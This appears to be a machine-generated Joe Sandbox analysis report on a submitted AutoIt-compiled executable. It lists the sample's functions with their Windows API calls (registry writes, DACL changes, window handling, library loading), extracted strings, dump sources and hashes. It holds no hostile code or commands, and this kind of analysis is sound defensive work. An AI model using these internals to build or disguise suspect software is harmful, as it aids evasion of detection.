                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00584AED
                                                                                                                        • GetDriveTypeW.KERNEL32(?,005ACB68,?,\\.\,005ACC08), ref: 00584BCA
                                                                                                                        • SetErrorMode.KERNEL32(00000000,005ACB68,?,\\.\,005ACC08), ref: 00584D36
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$DriveType
                                                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                        • API String ID: 2907320926-4222207086
                                                                                                                        • Opcode ID: af38697ff0efed5f1ef071ea9d655a5d1dde414de93feebda0aef2ca71669c9e
                                                                                                                        • Instruction ID: a4fe4a10574a2f80bbe6cb3e0c7aae25122c1ee87098477094d33ddda477cca2
                                                                                                                        • Opcode Fuzzy Hash: af38697ff0efed5f1ef071ea9d655a5d1dde414de93feebda0aef2ca71669c9e
                                                                                                                        • Instruction Fuzzy Hash: 9F619F306052079BCB24FF28DA859A8BFB5BB44300B248817EC06BB391DB71ED42DF51
                                                                                                                        Function 005A0241 Relevance: 37.1, APIs: 7, Strings: 14, Instructions: 391windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 005A02E5
                                                                                                                        • _wcslen.LIBCMT ref: 005A031F
                                                                                                                        • _wcslen.LIBCMT ref: 005A0389
                                                                                                                        • _wcslen.LIBCMT ref: 005A03F1
                                                                                                                        • _wcslen.LIBCMT ref: 005A0475
                                                                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 005A04C5
                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 005A0504
                                                                                                                          • Part of subcall function 0052F9F2: _wcslen.LIBCMT ref: 0052F9FD
                                                                                                                          • Part of subcall function 0057223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00572258
                                                                                                                          • Part of subcall function 0057223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0057228A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                        • String ID: @U=u$DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                        • API String ID: 1103490817-1753161424
                                                                                                                        • Opcode ID: 1fc21833fdea75421d92454de0b502d47e6d84d947715c964c0f38413dedc1f7
                                                                                                                        • Instruction ID: 984c2dfb9d2ae1228b1a1d95e6a528d2329a0da863f49a3b135384f9c8660dd6
                                                                                                                        • Opcode Fuzzy Hash: 1fc21833fdea75421d92454de0b502d47e6d84d947715c964c0f38413dedc1f7
                                                                                                                        • Instruction Fuzzy Hash: F2E1AE312282019FCB14DF28C45496EBBE2BFCA314F14496DF8969B3A1EB30ED45CB91
                                                                                                                        Function 005A0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCursorPos.USER32(?), ref: 005A1128
                                                                                                                        • GetDesktopWindow.USER32 ref: 005A113D
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 005A1144
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 005A1199
                                                                                                                        • DestroyWindow.USER32(?), ref: 005A11B9
                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 005A11ED
                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005A120B
                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 005A121D
                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,?), ref: 005A1232
                                                                                                                        • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 005A1245
                                                                                                                        • IsWindowVisible.USER32(00000000), ref: 005A12A1
                                                                                                                        • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 005A12BC
                                                                                                                        • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 005A12D0
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 005A12E8
                                                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 005A130E
                                                                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 005A1328
                                                                                                                        • CopyRect.USER32(?,?), ref: 005A133F
                                                                                                                        • SendMessageW.USER32(00000000,00000412,00000000), ref: 005A13AA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                        • String ID: ($0$tooltips_class32
                                                                                                                        • API String ID: 698492251-4156429822
                                                                                                                        • Opcode ID: 47b56bf184305f637032142a3dcff30c7487bbed3e454ac0d3ea40623ecda33c
                                                                                                                        • Instruction ID: 198b70755214fe71dde5ade3987a4bcd251b9b3215ad0fd46f9e56ff55373691
                                                                                                                        • Opcode Fuzzy Hash: 47b56bf184305f637032142a3dcff30c7487bbed3e454ac0d3ea40623ecda33c
                                                                                                                        • Instruction Fuzzy Hash: D9B18E71608741AFE704DF64C888BAEBFE5FF89350F008919F9999B261D731E844CB95
                                                                                                                        Function 00528891 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 282windowtimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00528968
                                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00528970
                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0052899B
                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 005289A3
                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 005289C8
                                                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 005289E5
                                                                                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 005289F5
                                                                                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00528A28
                                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00528A3C
                                                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00528A5A
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00528A76
                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00528A81
                                                                                                                          • Part of subcall function 0052912D: GetCursorPos.USER32(?), ref: 00529141
                                                                                                                          • Part of subcall function 0052912D: ScreenToClient.USER32(00000000,?), ref: 0052915E
                                                                                                                          • Part of subcall function 0052912D: GetAsyncKeyState.USER32(00000001), ref: 00529183
                                                                                                                          • Part of subcall function 0052912D: GetAsyncKeyState.USER32(00000002), ref: 0052919D
                                                                                                                        • SetTimer.USER32(00000000,00000000,00000028,005290FC), ref: 00528AA8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                        • String ID: @U=u$AutoIt v3 GUI
                                                                                                                        • API String ID: 1458621304-2077007950
                                                                                                                        • Opcode ID: fe5deceef4e13fe186f1359ca5ea59672493616eaece5e696c8dce377e7d2496
                                                                                                                        • Instruction ID: a49518bc8308b6110373f55120e4a08c53023691890e86ad0f41bf4d57921c7d
                                                                                                                        • Opcode Fuzzy Hash: fe5deceef4e13fe186f1359ca5ea59672493616eaece5e696c8dce377e7d2496
                                                                                                                        • Instruction Fuzzy Hash: AAB17971A0021A9FDB14DFA8DD89BAE7FB5FB49314F104229FA15EB2D0DB30A840DB55
                                                                                                                        Function 00575A1B Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 198windowtimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadIconW.USER32(00000063), ref: 00575A2E
                                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00575A40
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00575A57
                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00575A6C
                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00575A72
                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00575A82
                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00575A88
                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00575AA9
                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00575AC3
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00575ACC
                                                                                                                        • _wcslen.LIBCMT ref: 00575B33
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00575B6F
                                                                                                                        • GetDesktopWindow.USER32 ref: 00575B75
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00575B7C
                                                                                                                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00575BD3
                                                                                                                        • GetClientRect.USER32(?,?), ref: 00575BE0
                                                                                                                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 00575C05
                                                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00575C2F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 895679908-2594219639
                                                                                                                        • Opcode ID: 30612cc84018b78f48cf7f01230e89490f7eba844d435360fa553fc67054d6f2
                                                                                                                        • Instruction ID: f717d6a50677cd11ac83ddbc175e8d267dfc15700b27c56e0b97a4f71b2ac2ed
                                                                                                                        • Opcode Fuzzy Hash: 30612cc84018b78f48cf7f01230e89490f7eba844d435360fa553fc67054d6f2
                                                                                                                        • Instruction Fuzzy Hash: B0717F31900B059FDB20DFA8DE85A6EBFF5FF48705F104918E18AA35A0E7B4E944DB50
                                                                                                                        Function 005A091E Relevance: 31.9, APIs: 6, Strings: 12, Instructions: 372windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 005A09C6
                                                                                                                        • _wcslen.LIBCMT ref: 005A0A01
                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 005A0A54
                                                                                                                        • _wcslen.LIBCMT ref: 005A0A8A
                                                                                                                        • _wcslen.LIBCMT ref: 005A0B06
                                                                                                                        • _wcslen.LIBCMT ref: 005A0B81
                                                                                                                          • Part of subcall function 0052F9F2: _wcslen.LIBCMT ref: 0052F9FD
                                                                                                                          • Part of subcall function 00572BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00572BFA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                        • String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                        • API String ID: 1103490817-383632319
                                                                                                                        • Opcode ID: 183a11114ebdba956d1e227a35ebcf89a2938ea692ca679c3ecc26221646e1a4
                                                                                                                        • Instruction ID: 0b84ee3c1e562423bf36c7d2a3e3ff1fe8f90e3f4bb890a435a2b89ac42ce134
                                                                                                                        • Opcode Fuzzy Hash: 183a11114ebdba956d1e227a35ebcf89a2938ea692ca679c3ecc26221646e1a4
                                                                                                                        • Instruction Fuzzy Hash: 0EE17A312183069FC714DF28C45096EBBE2BF9A314F14895DF8969B3A2D731ED85CB91
                                                                                                                        Function 00570D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 005710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00571114
                                                                                                                          • Part of subcall function 005710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 00571120
                                                                                                                          • Part of subcall function 005710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 0057112F
                                                                                                                          • Part of subcall function 005710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 00571136
                                                                                                                          • Part of subcall function 005710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0057114D
                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00570DF5
                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00570E29
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00570E40
                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00570E7A
                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00570E96
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00570EAD
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00570EB5
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00570EBC
                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00570EDD
                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00570EE4
                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00570F13
                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00570F35
                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00570F47
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00570F6E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00570F75
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00570F7E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00570F85
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00570F8E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00570F95
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00570FA1
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00570FA8
                                                                                                                          • Part of subcall function 00571193: GetProcessHeap.KERNEL32(00000008,00570BB1,?,00000000,?,00570BB1,?), ref: 005711A1
                                                                                                                          • Part of subcall function 00571193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00570BB1,?), ref: 005711A8
                                                                                                                          • Part of subcall function 00571193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00570BB1,?), ref: 005711B7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4175595110-0
                                                                                                                        • Opcode ID: bea69d52af77047b49f5a6392c53582e99e784c421afece7c01ef645d96fe983
                                                                                                                        • Instruction ID: 94147933d3616d56b47a737123f6dcf21e42dfbca505811c516e75b67ece4b5c
                                                                                                                        • Opcode Fuzzy Hash: bea69d52af77047b49f5a6392c53582e99e784c421afece7c01ef645d96fe983
                                                                                                                        • Instruction Fuzzy Hash: 20714B72A0020AEBDF20DFA5EC48BAEBFB8BF15310F148115F919A6191D7719A09DB60
                                                                                                                        Function 005A833C Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 196windowlibraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 005A835A
                                                                                                                        • _wcslen.LIBCMT ref: 005A836E
                                                                                                                        • _wcslen.LIBCMT ref: 005A8391
                                                                                                                        • _wcslen.LIBCMT ref: 005A83B4
                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 005A83F2
                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,005A361A,?), ref: 005A844E
                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 005A8487
                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 005A84CA
                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 005A8501
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 005A850D
                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 005A851D
                                                                                                                        • DestroyIcon.USER32(?), ref: 005A852C
                                                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 005A8549
                                                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 005A8555
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                        • String ID: .dll$.exe$.icl$@U=u
                                                                                                                        • API String ID: 799131459-1639919054
                                                                                                                        • Opcode ID: 8dcef1b7d0d98209c2095154804ca46b79036a4fbb0d84f637fee62daa3745be
                                                                                                                        • Instruction ID: 4000e39377e1ed38495077e0679b0884a2ba5d4673d1438b79dc369000e5dc70
                                                                                                                        • Opcode Fuzzy Hash: 8dcef1b7d0d98209c2095154804ca46b79036a4fbb0d84f637fee62daa3745be
                                                                                                                        • Instruction Fuzzy Hash: 9F61E07190020ABFEB14DF64CC45BBE7FA8FB49721F10450AF815DA1D1EB74A980DBA0
                                                                                                                        Function 0059C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0059C4BD
                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,005ACC08,00000000,?,00000000,?,?), ref: 0059C544
                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0059C5A4
                                                                                                                        • _wcslen.LIBCMT ref: 0059C5F4
                                                                                                                        • _wcslen.LIBCMT ref: 0059C66F
                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0059C6B2
                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0059C7C1
                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0059C84D
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0059C881
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0059C88E
                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0059C960
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                        • API String ID: 9721498-966354055
                                                                                                                        • Opcode ID: 70b96369dc1efc9ea5de4df8554ac23e121700b998894ec052ba4e2edb32c090
                                                                                                                        • Instruction ID: 65d6091ea8e7ebefa0a227b30dc96ce80afb7bf4a83d511ccdbefd82c9d558a1
                                                                                                                        • Opcode Fuzzy Hash: 70b96369dc1efc9ea5de4df8554ac23e121700b998894ec052ba4e2edb32c090
                                                                                                                        • Instruction Fuzzy Hash: 891248356042029FDB14DF18C895A6ABFE5FF88714F05885DF85A9B3A2DB31ED81CB81
                                                                                                                        Function 0059C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                        • API String ID: 1256254125-909552448
                                                                                                                        • Opcode ID: 127438a9f410792700a45c4835133499e74ab092614900d6fa17821f88732fa9
                                                                                                                        • Instruction ID: eaf357bb85fa78da58079f1accf41328e4737ca79a2a4b9a844b8bb73652b882
                                                                                                                        • Opcode Fuzzy Hash: 127438a9f410792700a45c4835133499e74ab092614900d6fa17821f88732fa9
